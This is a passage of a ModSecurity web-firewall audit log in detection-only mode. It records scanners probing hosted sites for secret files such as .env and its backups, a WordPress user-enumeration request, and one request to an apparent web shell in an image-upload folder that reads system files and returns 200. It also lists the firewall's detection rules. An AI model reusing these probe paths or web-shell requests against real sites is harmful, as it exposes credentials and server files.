3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/backend/.env"] [unique_id "aFCRCaRT9PYLci8mxb0c9wAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110473784282 1681114 (- - -) Stopwatch2: 1750110473784282 1681114; combined=1691, p1=384, p2=1192, p3=0, p4=0, p5=114, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cb61ea0c-Z-- --98417d2b-A-- [17/Jun/2025:03:17:59.100321 +0530] aFCRDaC450Yw050Ymr0VVQAAAAk 185.177.72.115 36600 127.0.0.1 7081 --98417d2b-B-- GET /myproject/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --98417d2b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=ireob0ek7r304lovbsrq9srm1o; path=/ Set-Cookie: _sfs_id=c5bc690997c452e239b6ecf3c72ffaee1750110478; expires=Mon, 16 Jun 2025 22:47:58 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --98417d2b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/myproject/.env"] [unique_id "aFCRDaC450Yw050Ymr0VVQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110477405374 1695020 (- - -) Stopwatch2: 1750110477405374 1695020; combined=1943, p1=430, p2=1407, p3=0, p4=0, p5=106, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --98417d2b-Z-- --c027c779-A-- [17/Jun/2025:03:18:00.958781 +0530] aFCRD4oVQnPDyHnl9oPCswAAAAY 185.177.72.115 36634 127.0.0.1 7081 --c027c779-B-- GET /.envs/.production/.django HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c027c779-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache X-Cache-Enabled: False Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=r3vksjssj62lj3c3vea6pntcv8; path=/ Set-Cookie: _sfs_id=73130aa9c7e52b3ee6d48ae0e4cd15d71750110480; expires=Mon, 16 Jun 2025 22:48:00 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --c027c779-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.envs/.production/.django"] [unique_id "aFCRD4oVQnPDyHnl9oPCswAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110479282781 1676074 (- - -) Stopwatch2: 1750110479282781 1676074; combined=2056, p1=399, p2=1570, p3=0, p4=0, p5=87, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c027c779-Z-- --16280e47-A-- [17/Jun/2025:03:18:02.938626 +0530] aFCREUcTB7P_sALtclAIgwAAAAI 185.177.72.115 53684 127.0.0.1 7081 --16280e47-B-- GET /react-app/.env HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --16280e47-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=g8bi23230a01luclc6gb30523k; path=/ Set-Cookie: _sfs_id=a43a29d405c42dbc77cec622355b91161750110482; expires=Mon, 16 Jun 2025 22:48:02 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --16280e47-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/react-app/.env"] [unique_id "aFCREUcTB7P_sALtclAIgwAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110481072058 1866640 (- - -) Stopwatch2: 1750110481072058 1866640; combined=2038, p1=433, p2=1531, p3=0, p4=0, p5=73, sr=142, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --16280e47-Z-- --02986410-A-- [17/Jun/2025:03:18:04.777784 +0530] aFCRExwcFb_n1P0IC9yEggAAAAo 185.177.72.115 53740 127.0.0.1 7081 --02986410-B-- GET /react-app/.env.production HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --02986410-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=vflb0gf6nvlvmj2jbb3dkgsd8k; path=/ Set-Cookie: _sfs_id=1b11c549b222714f789d56923784e9ed1750110484; expires=Mon, 16 Jun 2025 22:48:04 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --02986410-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/react-app/.env.production"] [unique_id "aFCRExwcFb_n1P0IC9yEggAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110483052989 1724869 (- - -) Stopwatch2: 1750110483052989 1724869; combined=2034, p1=429, p2=1492, p3=0, p4=0, p5=112, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --02986410-Z-- --a4e7ed5f-A-- [17/Jun/2025:03:18:26.819109 +0530] aFCRKaC450Yw050Ymr0VXQAAAAk 185.177.72.115 38884 127.0.0.1 7081 --a4e7ed5f-B-- GET /.env.bak HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a4e7ed5f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=olm324u7jlidojtki25k23nl03; path=/ Set-Cookie: _sfs_id=509f6df4c4628a9da6b4e31fc5186d531750110506; expires=Mon, 16 Jun 2025 22:48:26 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --a4e7ed5f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.bak"] [unique_id "aFCRKaC450Yw050Ymr0VXQAAAAk"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.gulachi.com"] [uri "/.env.bak"] [unique_id "aFCRKaC450Yw050Ymr0VXQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110505147544 1671638 (- - -) Stopwatch2: 1750110505147544 1671638; combined=1692, p1=349, p2=1229, p3=0, p4=0, p5=114, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4e7ed5f-Z-- --a4d83425-A-- [17/Jun/2025:03:18:28.780412 +0530] aFCRKrp3uuKArZI2bI_mMAAAAAg 185.177.72.115 38934 127.0.0.1 7081 --a4d83425-B-- GET /.env.example HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a4d83425-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=rgmlms3ghusa8f65hcfv810rsl; path=/ Set-Cookie: _sfs_id=34f013afe0d2ecafdea5b91cd3627aaf1750110507; expires=Mon, 16 Jun 2025 22:48:27 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --a4d83425-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.example"] [unique_id "aFCRKrp3uuKArZI2bI_mMAAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110506932509 1848003 (- - -) Stopwatch2: 1750110506932509 1848003; combined=1891, p1=390, p2=1427, p3=0, p4=0, p5=74, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a4d83425-Z-- --4e93e876-A-- [17/Jun/2025:03:18:30.652271 +0530] aFCRLKRT9PYLci8mxb0dAwAAAAM 185.177.72.115 39168 127.0.0.1 7081 --4e93e876-B-- GET /.env.old HTTP/1.0 Host: www.gulachi.com X-Real-IP: 185.177.72.115 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4e93e876-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Set-Cookie: PHPSESSID=n57ki732ekjta2tvbbron01ncv; path=/ Set-Cookie: _sfs_id=d17dca6842bc1fd7fa0e6f1371a928251750110509; expires=Mon, 16 Jun 2025 22:48:29 GMT; Max-Age=3600; path=/; secure; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 --4e93e876-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.gulachi.com"] [uri "/.env.old"] [unique_id "aFCRLKRT9PYLci8mxb0dAwAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.gulachi.com"] [uri "/.env.old"] [unique_id "aFCRLKRT9PYLci8mxb0dAwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110508956069 1696282 (- - -) Stopwatch2: 1750110508956069 1696282; combined=1715, p1=330, p2=1287, p3=0, p4=0, p5=97, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e93e876-Z-- --a25e7101-A-- [17/Jun/2025:03:18:36.870566 +0530] aFCRNLp3uuKArZI2bI_mPQAAAAg 216.73.216.71 44078 127.0.0.1 7081 --a25e7101-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fld.so.conf.d&viewfile=%2F%2Fsnap%2Fcore20%2F2582%2Fetc%2Fld.so.conf.d%2Flibc.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --a25e7101-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3023 Connection: close Content-Type: text/html; charset=UTF-8 --a25e7101-H-- Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /snap/core20/2582/etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /snap/core20/2582/etc/ld.so.conf.d/libc.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:path: /snap/core20/2582/etc/ld.so.conf.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCRNLp3uuKArZI2bI_mPQAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/ld.so.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/ld.so.conf found within ARGS:viewfile: /snap/core20/2582/etc/ld.so.conf.d/libc.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCRNLp3uuKArZI2bI_mPQAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750110516866193 4427 (- - -) Stopwatch2: 1750110516866193 4427; combined=2474, p1=369, p2=1940, p3=41, p4=33, p5=91, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a25e7101-Z-- --bea8c933-A-- [17/Jun/2025:03:22:47.893919 +0530] aFCSLYoVQnPDyHnl9oPDZQAAAAY 78.153.140.222 36686 127.0.0.1 7081 --bea8c933-B-- GET /.env HTTP/1.0 Host: www.futuronomics.com X-Real-IP: 78.153.140.222 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.2 Safari/534.34 --bea8c933-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.futuronomics.com/wp-json/>; rel="https://api.w.org/" Set-Cookie: wpr_guest_token=6153387aedd0f4def08072491039b787c1c7b2e8fb1b53c05c933416bd70831f; expires=Mon, 16 Jun 2025 22:52:47 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 --bea8c933-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.futuronomics.com"] [uri "/.env"] [unique_id "aFCSLYoVQnPDyHnl9oPDZQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/futuronomics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110765950390 1943618 (- - -) Stopwatch2: 1750110765950390 1943618; combined=2300, p1=478, p2=1730, p3=0, p4=0, p5=92, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bea8c933-Z-- --498be065-A-- [17/Jun/2025:03:22:58.295614 +0530] aFCSOLp3uuKArZI2bI_m0QAAAAg 78.153.140.222 35714 127.0.0.1 7081 --498be065-B-- GET /api/.env HTTP/1.0 Host: www.futuronomics.com X-Real-IP: 78.153.140.222 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Opera/9.80 (Linux mips; ) Presto/2.12.407 Version/12.51 MB97/0.45.23.11 (JVC, Mxl661315_, wireless) VSTVB_MB97 SmartTvA/3.0.0 --498be065-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.futuronomics.com/wp-json/>; rel="https://api.w.org/" Set-Cookie: wpr_guest_token=7fb07a0570021101438cb9ff00282d09d420feacc6f1f8c1d2dcc9d6759d8456; expires=Mon, 16 Jun 2025 22:52:57 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 --498be065-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.futuronomics.com"] [uri "/api/.env"] [unique_id "aFCSOLp3uuKArZI2bI_m0QAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/futuronomics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110776586984 1708708 (- - -) Stopwatch2: 1750110776586984 1708708; combined=2238, p1=557, p2=1580, p3=0, p4=0, p5=100, sr=154, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --498be065-Z-- --8620da6f-A-- [17/Jun/2025:03:23:09.946777 +0530] aFCSRFJfblPUQiSn5r2BhQAAAAA 78.153.140.222 52398 127.0.0.1 7081 --8620da6f-B-- GET /dev/.env HTTP/1.0 Host: www.futuronomics.com X-Real-IP: 78.153.140.222 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: More Safari 4.0.4 user agents strings -->> --8620da6f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.futuronomics.com/wp-json/>; rel="https://api.w.org/" Set-Cookie: wpr_guest_token=f2b43e4e3703549b87595fa6e2f8faab72402882cab740d6aeaeaaad2300bc03; expires=Mon, 16 Jun 2025 22:53:09 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 --8620da6f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.futuronomics.com"] [uri "/dev/.env"] [unique_id "aFCSRFJfblPUQiSn5r2BhQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/futuronomics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750110788234246 1712641 (- - -) Stopwatch2: 1750110788234246 1712641; combined=2787, p1=383, p2=2259, p3=0, p4=0, p5=144, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8620da6f-Z-- --59b8081a-A-- [17/Jun/2025:03:25:18.519463 +0530] aFCSxQrsPejRtmHkrKLQ3wAAAAE 35.238.185.93 54774 127.0.0.1 7081 --59b8081a-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.csquaretech.com X-Real-IP: 35.238.185.93 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 